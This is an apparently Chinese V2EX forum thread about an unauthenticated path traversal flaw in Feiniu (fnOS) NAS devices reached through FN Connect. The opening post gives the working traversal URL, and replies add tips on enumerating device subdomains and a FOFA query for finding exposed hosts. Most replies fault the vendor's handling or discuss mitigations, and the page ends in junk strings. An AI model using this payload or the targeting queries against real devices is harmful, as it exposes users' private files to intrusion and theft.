飞牛这个漏洞 POC 太容易了啊 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
Tink

飞牛这个漏洞 POC 太容易了啊

  •  
  •   Tink
    PRO
    Jan 31 7284 views
    This topic created in 85 days ago, the information mentioned may be changed or developed.
    打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上

    /app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../

    直接就到 /了啊

    太离谱了
  • 漏洞
  • 登录页
    43 replies    2026-02-05 10:42:31 +08:00
    stinkytofux
        1
    stinkytofux  
       Jan 31   3
    0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害.
    Tink
        2
    Tink  
    OP
    PRO
       Jan 31
    @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞
    Joming
        3
    Joming  
       Jan 31
    TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了!
    wfhtqp
        4
    wfhtqp  
       Jan 31
    问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了
    wfhtqp
        5
    wfhtqp  
       Jan 31   3
    https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。
    YJBZC
        6
    YJBZC  
       Jan 31
    @wfhtqp 我草,飞牛官方团队在一个多月前就知道这个漏洞了,到今天都没发个公告或者强制更新修复
    wfhtqp
        7
    wfhtqp  
       Feb 1
    @YJBZC 这才哪到哪? fn connect 还开着呢
    labubu
        8
    labubu  
       Feb 1 via Android
    不是绑定手机了吗,打电话发短信给用户呗?
    bitkuang
        9
    bitkuang  
       Feb 1 via Android
    没复现出来,还有别的条件吧
    haoshuaiwang
        10
    haoshuaiwang  
       Feb 1
    写个脚本跑就行了

    {fnid}.fnos.net
    baton
        11
    baton  
       Feb 1 via Android   1
    经历过宝塔后就不敢用国内这些面板,安全性是个大问题
    a9htdkbv
        12
    a9htdkbv  
       Feb 1 via Android
    还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了
    emoker
        13
    emoker  
       Feb 1
    @baton 请教宝塔具体是啥问题?之前没关注过
    AkinoKaedeChan
        14
    AkinoKaedeChan  
       Feb 1 via Android
    flyqie
        15
    flyqie  
       Feb 1 via Android   1
    是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。
    yinanc
        16
    yinanc  
       Feb 1   2
    @flyqie 估计就国内处理问题的一贯思路,装死等这波舆论过去了,就可以当没有发生了
    emoker
        17
    emoker  
       Feb 1
    @AkinoKaedeChan 感谢大佬
    stinkytofux
        18
    stinkytofux  
       Feb 1
    ryd994
        19
    ryd994  
       Feb 1 via Android
    我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。

    我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。
    hanguofu
        20
    hanguofu  
       Feb 1
    @ryd994 : 请问你是自己买了一个域名并用 cf 代理吗 ?
    sardina
        21
    sardina  
       Feb 1
    2025-12-25 18:06:25 只看该作者回复
    感谢反馈我转给负责的同事看看
    一个月前就说反馈 结果还没修复。。。
    Curtion
        22
    Curtion  
       Feb 1
    还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。
    MiKing233
        23
    MiKing233  
       Feb 1
    @flyqie 说做不了是不可能的, 哪怕临时停止解析 5ddd.com 这种 FN Connect 域名也可以尽可能减少漏洞利用范围, 我真没看明白他们除了在论坛发帖忽悠小白之外究竟还采取了哪些主动的安全挽救措施
    MiKing233
        24
    MiKing233  
       Feb 1
    @flyqie 以及漏洞被大规模利用已经过去超过了一天一夜, 我不知道他们公司的老板和法人是怎么睡得着觉的
    panda188
        25
    panda188  
       Feb 1 via Android
    不会降本增效,已经把负责这个,会这个的裁了吧?
    hatch
        26
    hatch  
       Feb 1
    作死,估计内部也一团糟,问题流转半天找不到能挑担的人
    bluekz
        27
    bluekz  
       Feb 1
    @wfhtqp #4 啊?不打开 fn connect 和 ddns 等任何外网方式也能暴露什么?
    povsister
        28
    povsister  
       Feb 1   1
    好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎
    chinni
        29
    chinni  
       Feb 1
    其实现在点什么目录基本都 404 也没啥了,但是确实坑,不如直接用 zero trust
    Tink
        30
    Tink  
    OP
    PRO
       Feb 1
    @chinni 点链接没用的,手拼目录名到 url 可以
    quu
        31
    quu  
       Feb 1
    @Curtion fofa 可以再精准点

    (port="5666")&& icon_hash="470295793" icon + 端口验证
    someonesnone
        32
    someonesnone  
       Feb 1
    @chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试...
    ritziiiiii
        33
    ritziiiiii  
       Feb 2 via Android
    不开 Fn Connect ,只开 ipv6 公网 和 ssh ,
    而且也把后缀 5666 ,5667 改了,ssh 的 22 也改了,这样还会出现问题吗?
    还有要不要进 PE 扫硬盘上的毒啊?
    alenchen
        34
    alenchen  
       Feb 2
    自己 ddns 的不香吗?非要走别人家里再回来
    crc8
        35
    crc8  
       Feb 2
    @someonesnone 不堪入目
    Tink
        36
    Tink  
    OP
    PRO
       Feb 2
    @alenchen #34 没什么用,这次这个 poc 是无差别的
    jpyl0423
        37
    jpyl0423  
       Feb 2
    @alenchen #34 自己的也一样
    tatay
        38
    tatay  
       Feb 2
    自己的飞牛也试了一下,升到 18 版本后显示 404 了。不升级的话仍然可以访问。飞牛这一波闹大了。
    Rorysky
        39
    Rorysky  
       Feb 2
    @stinkytofux 0day 都被人大规模发出来了,还叫 0day 么? 0day 准确是指开发者都不知道漏洞,在软件更新前,搞得飞牛是个很厉害的软件系统似的。本质就是个 web 后台
    Valid
        40
    Valid  
       Feb 2
    fn 完全可以直接拦截这个 url ,我不理解
    thevita
        41
    thevita  
       Feb 2
    我的观点有点极端,以“体验”为核心卖点的产品,其安全性都要深入考验(但其实也没啥好办法,一般就看看对方安全负责人是谁)
    1. 大概 8-9 年前小米的路由也很多这种弱智漏洞,给 src 还给了我几千块钱,基于 luci, 感觉是 lua 生态的缺乏,很多东西的实现靠手写,但写得太糙了,后来应该是安全部门介入,加了很多安全措施
    2. 去年 RSC/nextjs 的漏洞也很离谱,好在处理没 fn 这么离谱,刚看说社区一个月前就有人发现了
    rayyume
        42
    rayyume  
       Feb 2
    没用过飞牛,用的 lucky 反代高位端口+cloudflare 开启 https+规则端口转发,应该还算安全吧?
    HADB
        43
    HADB  
       Feb 5
    到现在还没看到分析,这么大的漏洞是怎么产生的,这个 /app-center-static/serviceicon/myapp 是给什么服务开的
    About     Help     Advertise     Blog     API     FAQ     Solana     980 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 100ms UTC 22:49 PVG 06:49 LAX 15:49 JFK 18:49
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86